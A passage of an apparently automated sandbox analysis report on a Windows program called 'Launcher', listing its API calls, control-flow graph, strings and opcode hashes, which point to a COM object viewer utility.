                                                                                                    control_flow_graph 588 67ee23-67ee4a call 67fd98 GetStartupInfoW 591 67ee4c-67ee5b 588->591 592 67ee75-67ee77 591->592 593 67ee5d-67ee5f 591->593 596 67ee78-67ee7e 592->596 594 67ee61-67ee66 593->594 595 67ee68-67ee73 Sleep 593->595 594->596 595->591 597 67ee80-67ee88 _amsg_exit 596->597 598 67ee8a-67ee90 596->598 599 67eec4-67eeca 597->599 600 67ee92-67eeab call 67effe 598->600 601 67eebe 598->601 602 67eee7-67eee9 599->602 603 67eecc-67eedd _initterm 599->603 600->599 608 67eead-67eeb9 600->608 601->599 605 67eef4-67eefb 602->605 606 67eeeb-67eef2 602->606 603->602 609 67ef20-67ef29 605->609 610 67eefd-67ef0a call 67fbf0 605->610 606->605 611 67efee-67effd 608->611 609->608 613 67ef2b-67ef31 609->613 610->609 618 67ef0c-67ef1e 610->618 614 67ef34-67ef3a 613->614 616 67ef3c-67ef3f 614->616 617 67ef8b-67ef8e 614->617 619 67ef41-67ef43 616->619 620 67ef5a-67ef5e 616->620 621 67ef90-67ef99 617->621 622 67ef9c-67efa2 617->622 618->609 619->617 623 67ef45-67ef48 619->623 624 67ef66-67ef68 620->624 625 67ef60-67ef64 620->625 621->622 622->614 623->620 627 67ef4a-67ef4d 623->627 628 67ef69-67ef71 call 6800d1 624->628 625->628 627->620 629 67ef4f-67ef58 627->629 631 67ef76-67ef82 628->631 629->623 632 67ef84-67ef85 exit 631->632 633 67efd3-67efda 631->633 632->617 634 67efe7 633->634 635 67efdc-67efe2 _cexit 633->635 634->611 635->634
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_inittermexit
                                                                                                    • String ID: \>h$\>h
                                                                                                    • API String ID: 2849151604-2792430406
                                                                                                    • Opcode ID: 0a5906dd0088c1aaebf7dc836a753f5762d8a13a3f3f8d2d3bfb3dfdc5f1fdeb
                                                                                                    • Instruction ID: 50f25e67100234b0ca9d9d7f2e6c772506947e927e48ceec7e4a066c52c948d8
                                                                                                    • Opcode Fuzzy Hash: 0a5906dd0088c1aaebf7dc836a753f5762d8a13a3f3f8d2d3bfb3dfdc5f1fdeb
                                                                                                    • Instruction Fuzzy Hash: B041F371A04321ABDB249F58E8097B977B3FB08B10F1086AAE909977D0DB7A8D45CB50
                                                                                                    APIs
                                                                                                    • #5491.MFC42U ref: 00670DA3
                                                                                                    • #4451.MFC42U(?), ref: 00670DAD
                                                                                                    • #2112.MFC42U(?,50002800,0000E800,?), ref: 00670DCE
                                                                                                    • #4158.MFC42U(00000002,?,50002800,0000E800,?), ref: 00670DDF
                                                                                                    • #5867.MFC42U(?,00000002,?,50002800,0000E800,?), ref: 00670DF4
                                                                                                    • #2109.MFC42U(?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00670E0C
                                                                                                    • #5996.MFC42U(006839A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00670E1E
                                                                                                    • #3477.MFC42U(00000000,?,?,?,006839A0,00000001,?,50008200,0000E801,?,00000002,?,50002800,0000E800,?), ref: 00670E37
                                                                                                    • #6063.MFC42U(00000000,00000000,?,?,00000000,?,?,?,006839A0,00000001,?,50008200,0000E801,?,00000002), ref: 00670E4E
                                                                                                    • #2550.MFC42U(00000001,00000000,00000000,?,?,00000000,?,?,?,006839A0,00000001,?,50008200,0000E801,?,00000002), ref: 00670E57
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2109#2112#2550#3477#4158#4451#5491#5867#5996#6063
                                                                                                    • String ID:
                                                                                                    • API String ID: 1972827604-0
                                                                                                    • Opcode ID: c0a949fa475647106120e2823aca50c33798991150e04515f46504957d0c244a
                                                                                                    • Instruction ID: eb028046a66da745a05873c7c4c34b87d775582b9353dc6fe02885f67867745c
                                                                                                    • Opcode Fuzzy Hash: c0a949fa475647106120e2823aca50c33798991150e04515f46504957d0c244a
                                                                                                    • Instruction Fuzzy Hash: E8110B3531021476FE5062708D46FFF769F9FC8B10F148959B61FE62C1EEA1A9098278
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 00670CCD
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00670CF8
                                                                                                    • SendMessageW.USER32(?,00001061,00000001,?), ref: 00670D1C
                                                                                                    • #2634.MFC42U(00000000), ref: 00670D2A
                                                                                                    • #2634.MFC42U(00000000,00000000), ref: 00670D37
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #2634MessageSend$#4704
                                                                                                    • String ID: Can Launch$User/Group$j
                                                                                                    • API String ID: 3599582684-3481516568
                                                                                                    • Opcode ID: f805a69591fe78b4756cb308d9b9c21069eba7d396e8fdf46b8b164733b2a319
                                                                                                    • Instruction ID: cdca11f9f495ab99079e05b6ace2ec873d323c5918d12c50cda288ad26401469
                                                                                                    • Opcode Fuzzy Hash: f805a69591fe78b4756cb308d9b9c21069eba7d396e8fdf46b8b164733b2a319
                                                                                                    • Instruction Fuzzy Hash: D401A2319003096FEB209FA0CC46FEFBBBAEB45714F40001DF50576290CBB25A44CBA0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcat$wsprintf
                                                                                                    • String ID: APPID\%s$AppID
                                                                                                    • API String ID: 3128662910-1823611323
                                                                                                    • Opcode ID: 4f28cbb51ea6745a279495a590a9d8f95029ded415ceb7f1992e613e53627021
                                                                                                    • Instruction ID: 618d460ba9769c2686364a62c4973289e63ae070f77dac935e506c1b6aa1979b
                                                                                                    • Opcode Fuzzy Hash: 4f28cbb51ea6745a279495a590a9d8f95029ded415ceb7f1992e613e53627021
                                                                                                    • Instruction Fuzzy Hash: 780184B1500319BBCB10EF24DC89D9B77BEEF05714F105555B915A3242DA709E488BA0
                                                                                                    APIs
                                                                                                    • #2244.MFC42U(?,00000001,00000002,50000000,0000E900), ref: 006716E1
                                                                                                    • #3476.MFC42U(00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00671744
                                                                                                    • #3476.MFC42U(00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 00671755
                                                                                                    • #5848.MFC42U(00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 0067175D
                                                                                                    • #5906.MFC42U(00000000,000000F0,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000002,50000000,0000E900), ref: 0067176B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #3476$#2244#5848#5906
                                                                                                    • String ID:
                                                                                                    • API String ID: 2288433627-0
                                                                                                    • Opcode ID: 6df6323d4fc4b95d5388d03acbd6c23864c687943ad2154c0c317dab6c89a104
                                                                                                    • Instruction ID: cd849aabcd93c1e10a056b6fea86a06c6b49447b66a84772d3b15f845eeda8b3
                                                                                                    • Opcode Fuzzy Hash: 6df6323d4fc4b95d5388d03acbd6c23864c687943ad2154c0c317dab6c89a104
                                                                                                    • Instruction Fuzzy Hash: 4B1194313412117BEA6456664C59FBB7A5FDF89B60F444466BE0AEB3C1DEA19C0086A0
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0067153D
                                                                                                    • #366.MFC42U(00000004,00670D8A,00000004), ref: 00671547
                                                                                                    • #527.MFC42U(00000004,00670D8A,00000004), ref: 0067155C
                                                                                                    • #529.MFC42U(00000004,00670D8A,00000004), ref: 0067156B
                                                                                                    • #554.MFC42U(00000004,00670D8A,00000004), ref: 0067157A
                                                                                                      • Part of subcall function 006715A4: #439.MFC42U ref: 006715B0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #366#439#527#529#554H_prolog3
                                                                                                    • String ID:
                                                                                                    • API String ID: 3098594135-0
                                                                                                    • Opcode ID: e1aa89deeaadc7e36263de9999e20dc2577105c8d74674fe9196d0e3e9464288
                                                                                                    • Instruction ID: c223322c2598c9a100f1084e44d402e7907934e081f35067857032c1511a30ce
                                                                                                    • Opcode Fuzzy Hash: e1aa89deeaadc7e36263de9999e20dc2577105c8d74674fe9196d0e3e9464288
                                                                                                    • Instruction Fuzzy Hash: 93F09070801780CBE350EBB0C1157DDBBA1AF14310F1089CDE1DE03282DB752608CB66
                                                                                                    APIs
                                                                                                      • Part of subcall function 00673F53: #303.MFC42U(SysTreeView32,50800000,?,000000FF,?,00673D6D,800E373A,?,00000000,00680996,000000FF,?,00672096), ref: 00673F69
                                                                                                    • #540.MFC42U(800E373A,?,00000000,00680996,000000FF,?,00672096), ref: 00673D80
                                                                                                    • #1105.MFC42U(00675270,000000FF,00000000,00000000,00000004,00000000), ref: 00673E62
                                                                                                      • Part of subcall function 00673CFC: #543.MFC42U(00000000,?,00000000,?,00673E30), ref: 00673D0A
                                                                                                      • Part of subcall function 00673CFC: InitializeCriticalSection.KERNEL32(00000008,00000000,?,00000000,?,00673E30), ref: 00673D19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1105#303#540#543CriticalInitializeSection
                                                                                                    • String ID: `yg
                                                                                                    • API String ID: 4030040872-2596086902
                                                                                                    • Opcode ID: 51462502252ccafc6ebb87e135281d8d4449b46af6dbcc922d830fcd5a6d179e
                                                                                                    • Instruction ID: 00bf1590fb568330debb40fb7128db63aed97648396129ed8d1cfdd8bb8837b8
                                                                                                    • Opcode Fuzzy Hash: 51462502252ccafc6ebb87e135281d8d4449b46af6dbcc922d830fcd5a6d179e
                                                                                                    • Instruction Fuzzy Hash: 8F41E271E10359DFDB01DF98C856BAEBBF1BB04715F104559E021AB3A2C3B9AA44CF58
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D70D
                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,80000000,0067D6E4,?,?,?,0067D6E4,80000000,?,?,?,?,?), ref: 0067D72C
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0067D6E4,80000000,?,?,?,?,?,?,?,?), ref: 0067D738
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3677997916-0
                                                                                                    • Opcode ID: ee98c94d8dfc09e5f9bcd39f0b83c58a85490358b7815deb55e4dec7add95053
                                                                                                    • Instruction ID: 82e9f5c1e926e49d44966d66daa0846dc6d10909c9e74e3e43e5b85500affc91
                                                                                                    • Opcode Fuzzy Hash: ee98c94d8dfc09e5f9bcd39f0b83c58a85490358b7815deb55e4dec7add95053
                                                                                                    • Instruction Fuzzy Hash: 68F0B27590020EFFDF128F90DD09E9E7FBAEF48344F104055FA05A6160EB71DA20AB50
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,RHg), ref: 00677F1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID: RHg
                                                                                                    • API String ID: 3850602802-2064585274
                                                                                                    • Opcode ID: 0ab251bb9ad3b6a2ce82e79d7e35f48a08df5cca2874c90410bf950f783cdc46
                                                                                                    • Instruction ID: a45cd14174735e5358d6540f9d54cd42a72d79e7ec6c793003ab3b9c11613fa5
                                                                                                    • Opcode Fuzzy Hash: 0ab251bb9ad3b6a2ce82e79d7e35f48a08df5cca2874c90410bf950f783cdc46
                                                                                                    • Instruction Fuzzy Hash: 77C08C32080208BBE7001B41DC05FC17E2AE794721F514010F318080A08B7398219644
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #1662#2644
                                                                                                    • String ID:
                                                                                                    • API String ID: 3643970462-0
                                                                                                    • Opcode ID: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
                                                                                                    • Instruction ID: a5c4a9528402f3534010176fe5fb5b81f2246286b97fcf057226204ccf671884
                                                                                                    • Opcode Fuzzy Hash: b2a4955d172f6893873056020b2d99104e7532283901debc0db40684e72d8a1e
                                                                                                    • Instruction Fuzzy Hash: 8F41A134A10218EFCB44DF94C596DACBBB2FF54724F618498E84AAB361D771AF41EB04
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _callnewhmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2285944120-0
                                                                                                    • Opcode ID: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
                                                                                                    • Instruction ID: bd8ff5437758866546d1149509515f11a745bd574fe13ad4abffd34e9049944d
                                                                                                    • Opcode Fuzzy Hash: 42dd992d449b805a10e81f054b7db909a7b89bb086b073c0934b2cc9592ffe85
                                                                                                    • Instruction Fuzzy Hash: 91D0A73220052AB34A322659DC0089B7A6BCE52BF0315C435F80C9E315EE11CD1182C0
                                                                                                    APIs
                                                                                                    • #4704.MFC42U ref: 006795D5
                                                                                                      • Part of subcall function 0066B421: #1172.MFC42U(?,0066B338), ref: 0066B424
                                                                                                      • Part of subcall function 00679597: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 006795A0
                                                                                                      • Part of subcall function 00679597: #2855.MFC42U(00000000), ref: 006795A7
                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006795FC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$#1172#2855#4704
                                                                                                    • String ID:
                                                                                                    • API String ID: 854760084-0
                                                                                                    • Opcode ID: 19e94d20a6822827aabec7ec975d1b479dbbcaf43ee0d8b83277431f393cf0e0
                                                                                                    • Instruction ID: dd17ce1cd1033cfcbd6472f3ea43bfa33c56c46da904cf416bad5ba233ae5d36
                                                                                                    • Opcode Fuzzy Hash: 19e94d20a6822827aabec7ec975d1b479dbbcaf43ee0d8b83277431f393cf0e0
                                                                                                    • Instruction Fuzzy Hash: D1D02E312201206FF360BB70EC09FA636DFEF89320F0680B8B908CB1A2CE61CC008720
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #4435
                                                                                                    • String ID:
                                                                                                    • API String ID: 3199213920-0
                                                                                                    • Opcode ID: c52902ddf3ce77c3f7388957e6620425dd07e389e919fe0156f14a50d583eca3
                                                                                                    • Instruction ID: 2d16ac3d9a6b7b2f59968e27d988c86a3b42ab7812fa263adf3e5329bfe58c6b
                                                                                                    • Opcode Fuzzy Hash: c52902ddf3ce77c3f7388957e6620425dd07e389e919fe0156f14a50d583eca3
                                                                                                    • Instruction Fuzzy Hash: 79018635700159ABDF199B55D858BBEBB66FB84325F44413BED0587391CB309D11CBD0
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 0066EAB7
                                                                                                      • Part of subcall function 0067DE06: malloc.MSVCRT ref: 0067DE1E
                                                                                                      • Part of subcall function 0066EAE6: __EH_prolog3.LIBCMT ref: 0066EAED
                                                                                                      • Part of subcall function 0066EAE6: #338.MFC42U(0000000C,0066EAD7,00000004), ref: 0066EAF7
                                                                                                      • Part of subcall function 0066EAE6: #540.MFC42U(0000000C,0066EAD7,00000004), ref: 0066EB0B
                                                                                                      • Part of subcall function 0066EAE6: #860.MFC42U(0066349E,0000000C,0066EAD7,00000004), ref: 0066EB27
                                                                                                      • Part of subcall function 0066EAE6: #540.MFC42U ref: 0066EB36
                                                                                                      • Part of subcall function 0066EAE6: #540.MFC42U ref: 0066EB42
                                                                                                      • Part of subcall function 0066EAE6: #4155.MFC42U(00000004), ref: 0066EB50
                                                                                                      • Part of subcall function 0066EAE6: #4155.MFC42U(00000008,00000004), ref: 0066EB5A
                                                                                                      • Part of subcall function 0066EAE6: #3516.MFC42U(?,?,00000005,00000008,00000004), ref: 0066EB6E
                                                                                                      • Part of subcall function 0066EAE6: #861.MFC42U(ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EB7E
                                                                                                      • Part of subcall function 0066EAE6: #3516.MFC42U(?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EB8D
                                                                                                      • Part of subcall function 0066EAE6: #861.MFC42U(ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EB9D
                                                                                                      • Part of subcall function 0066EAE6: #3516.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EBAC
                                                                                                      • Part of subcall function 0066EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EBB7
                                                                                                      • Part of subcall function 0066EAE6: #800.MFC42U(?,?,00000001,ExpertMode,?,?,00000000,ViewHiddenComCats,?,?,00000005,00000008,00000004), ref: 0066EBBF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #3516#540$#4155#800#861H_prolog3$#338#860malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1769621591-0
                                                                                                    • Opcode ID: 4d9eeb8681f7127537df5a8393f9316ee3a3cc0801ec054482a20e9567255794
                                                                                                    • Instruction ID: a649e30ea5e2c036d9ad45298ccfb8b6fca8b56451b53b3341b9929a63672f21
                                                                                                    • Opcode Fuzzy Hash: 4d9eeb8681f7127537df5a8393f9316ee3a3cc0801ec054482a20e9567255794
                                                                                                    • Instruction Fuzzy Hash: 8DD0C775B5550197DF98BBF41412B5D15936F44310F60883DB648D9381DE6189008259
                                                                                                    APIs
                                                                                                    • __EH_prolog3.LIBCMT ref: 00670D67
                                                                                                      • Part of subcall function 0067DE06: malloc.MSVCRT ref: 0067DE1E
                                                                                                      • Part of subcall function 00671536: __EH_prolog3.LIBCMT ref: 0067153D
                                                                                                      • Part of subcall function 00671536: #366.MFC42U(00000004,00670D8A,00000004), ref: 00671547
                                                                                                      • Part of subcall function 00671536: #527.MFC42U(00000004,00670D8A,00000004), ref: 0067155C
                                                                                                      • Part of subcall function 00671536: #529.MFC42U(00000004,00670D8A,00000004), ref: 0067156B
                                                                                                      • Part of subcall function 00671536: #554.MFC42U(00000004,00670D8A,00000004), ref: 0067157A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog3$#366#527#529#554malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 3012659443-0
                                                                                                    • Opcode ID: c1f96e3bdcd65e6570865878966fda918536645f98fcf216de2252a7503f4b48
                                                                                                    • Instruction ID: 85ab912e6a5eb968151cc752961b906a9f161763a930f40e0955302ee3fcd7e3
                                                                                                    • Opcode Fuzzy Hash: c1f96e3bdcd65e6570865878966fda918536645f98fcf216de2252a7503f4b48
                                                                                                    • Instruction Fuzzy Hash: 18D0C9B1B4120297EFD8BBFC5826B5D15A35F45310F60C93DA24DDA281DE608A00866D
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237111378.0000000000683000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.2237140315.0000000000684000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_660000_Launcher.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: #439
                                                                                                    • String ID:
                                                                                                    • API String ID: 466583480-0
                                                                                                    • Opcode ID: 13be0d4cb4729adff3c7d63e7a5ff9b3672a162db0dd7bc77e2554dd8f4517ef
                                                                                                    • Instruction ID: 22e7b15654067f87842258f4d82b219c0979a0fd4611051237e838c9e2d3af13
                                                                                                    • Opcode Fuzzy Hash: 13be0d4cb4729adff3c7d63e7a5ff9b3672a162db0dd7bc77e2554dd8f4517ef
                                                                                                    • Instruction Fuzzy Hash: BDC08CB2601264A78B106F4E980688ABEDDC9C5BA0311009EB405A7200EEF09E0083E9
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.2236955771.0000000000661000.00000020.00000001.01000000.00000008.sdmp, Offset: 00660000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.2236867884.0000000000660000.00000002.00000001.01000000.00000008.sdmpDownload File
